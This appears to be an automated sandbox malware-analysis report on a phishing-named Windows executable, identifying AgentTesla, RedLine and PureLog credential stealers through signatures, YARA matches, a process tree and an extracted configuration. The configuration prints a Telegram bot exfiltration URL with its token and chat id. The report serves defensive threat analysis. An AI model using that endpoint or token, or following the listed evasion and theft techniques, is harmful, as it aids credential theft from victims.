Edit tour

Windows Analysis Report
Case_Your company bad driver Vehicle No.exe

Overview

General Information

Sample name:	Case_Your company bad driver Vehicle No.exe
Analysis ID:	1436302
MD5:	ac5df4d0010a0d3b07047c48eab42a3e
SHA1:	fcbcdf06cec7d0b82091f8cf315507417bb4892f
SHA256:	a118ce49e0877aa53eb801200c2c240e1b7faeeeda6f399cd12b14bda1bf6c6c
Tags:	exe
Infos:

Detection

AgentTesla, PureLog Stealer, RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Snort IDS alert for network traffic

Yara detected AgentTesla

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected Telegram RAT

.NET source code contains method to dynamically call methods (often used by packers)

Binary is likely a compiled AutoIt script file

Contains functionality to log keystrokes (.Net Source)

Drops VBS files to the startup folder

Installs a global keyboard hook

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample uses process hollowing technique

Sigma detected: WScript or CScript Dropper

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Creates processes with suspicious names

Detected potential crypto function

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Case_Your company bad driver Vehicle No.exe (PID: 7436 cmdline: "C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe" MD5: AC5DF4D0010A0D3B07047C48EAB42A3E)

name.exe (PID: 4260 cmdline: "C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe" MD5: 2AE322D5CE2B39574F35D1EEE4788A83)

RegSvcs.exe (PID: 4788 cmdline: "C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

name.exe (PID: 4940 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 2AE322D5CE2B39574F35D1EEE4788A83)

RegSvcs.exe (PID: 1440 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

wscript.exe (PID: 5240 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

name.exe (PID: 5660 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 2AE322D5CE2B39574F35D1EEE4788A83)

RegSvcs.exe (PID: 4864 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://asec.ahnlab.com/ko/29133/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7166327996:AAGPihVNd1ShcG_CmE24Dqt8T2_CJLtBA7k/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7166327996:AAGPihVNd1ShcG_CmE24Dqt8T2_CJLtBA7k/sendMessage?chat_id=7062552884"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000002.3336864673.0000000003710000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000A.00000002.3336864673.0000000003710000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 28 88 44 24 2B 88 44 24 2F B0 ED 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000008.00000002.3304083272.00000000033A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000008.00000002.3304083272.00000000033A0000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 28 88 44 24 2B 88 44 24 2F B0 ED 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
0000000F.00000002.3842075995.00000000032B8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x4280a:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x4287c:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x42906:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x42998:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x42a02:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x42a74:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x42b0a:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x42b9a:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0000000F.00000002.3842075995.000000000330C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000B.00000002.3449507339.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000B.00000002.3449507339.0000000000400000.00000040.80000000.00040000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 28 88 44 24 2B 88 44 24 2F B0 ED 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000E.00000002.3449893133.0000000003C50000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000E.00000002.3449893133.0000000003C50000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 28 88 44 24 2B 88 44 24 2F B0 ED 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
0000000B.00000002.3451674428.00000000029B0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.3451674428.00000000029B0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000B.00000002.3451674428.00000000029B0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000B.00000002.3451674428.00000000029B0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000B.00000002.3477412077.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.3477412077.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000B.00000002.3477412077.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000B.00000002.3477412077.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000B.00000002.3452111397.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.3452111397.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000B.00000002.3452111397.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000B.00000002.3452111397.0000000002D19000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000B.00000002.3452111397.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000F.00000002.3842075995.000000000328E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000F.00000002.3842075995.00000000032E9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000F.00000002.3842075995.00000000032CF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000B.00000002.3452111397.0000000002CFF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000B.00000002.3478826370.0000000005490000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.3478826370.0000000005490000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000B.00000002.3478826370.0000000005490000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000B.00000002.3478826370.0000000005490000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000B.00000002.3478826370.0000000005490000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x41922:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x41994:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x41a1e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x41ab0:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x41b1a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x41b8c:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x41c22:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x41cb2:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Process Memory Space: RegSvcs.exe PID: 1440	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 1440	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegSvcs.exe PID: 1440	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 4864	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 4864	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegSvcs.exe PID: 4864	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 38 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
11.2.RegSvcs.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 28 88 44 24 2B 88 44 24 2F B0 ED 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
14.2.name.exe.3c50000.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
14.2.name.exe.3c50000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 28 88 44 24 2B 88 44 24 2F B0 ED 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
11.2.RegSvcs.exe.51d0ee8.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.RegSvcs.exe.51d0ee8.5.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
11.2.RegSvcs.exe.51d0ee8.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.RegSvcs.exe.51d0ee8.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.RegSvcs.exe.51d0ee8.5.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3fb22:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3fb94:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3fc1e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3fcb0:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3fd1a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3fd8c:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3fe22:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3feb2:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
8.2.name.exe.33a0000.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
8.2.name.exe.33a0000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 28 88 44 24 2B 88 44 24 2F B0 ED 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
11.2.RegSvcs.exe.29f1046.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.RegSvcs.exe.29f1046.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
11.2.RegSvcs.exe.29f1046.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.RegSvcs.exe.29f1046.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.RegSvcs.exe.29f1046.2.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3fb22:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3fb94:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3fc1e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3fcb0:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3fd1a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3fd8c:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3fe22:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3feb2:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
11.2.RegSvcs.exe.5490000.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.RegSvcs.exe.5490000.6.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
11.2.RegSvcs.exe.5490000.6.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.RegSvcs.exe.5490000.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.RegSvcs.exe.5490000.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x41922:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x41994:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x41a1e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x41ab0:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x41b1a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x41b8c:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x41c22:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x41cb2:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
11.2.RegSvcs.exe.51d0ee8.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.RegSvcs.exe.51d0ee8.5.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
11.2.RegSvcs.exe.51d0ee8.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.RegSvcs.exe.51d0ee8.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.RegSvcs.exe.51d0ee8.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x41922:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x41994:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x41a1e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x41ab0:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x41b1a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x41b8c:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x41c22:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x41cb2:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
11.2.RegSvcs.exe.51d0000.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.RegSvcs.exe.51d0000.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
11.2.RegSvcs.exe.51d0000.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.RegSvcs.exe.51d0000.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.RegSvcs.exe.51d0000.4.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x40a0a:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x40a7c:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x40b06:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x40b98:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x40c02:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x40c74:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x40d0a:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x40d9a:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
11.2.RegSvcs.exe.29f1046.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.RegSvcs.exe.29f1046.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
11.2.RegSvcs.exe.29f1046.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.RegSvcs.exe.29f1046.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
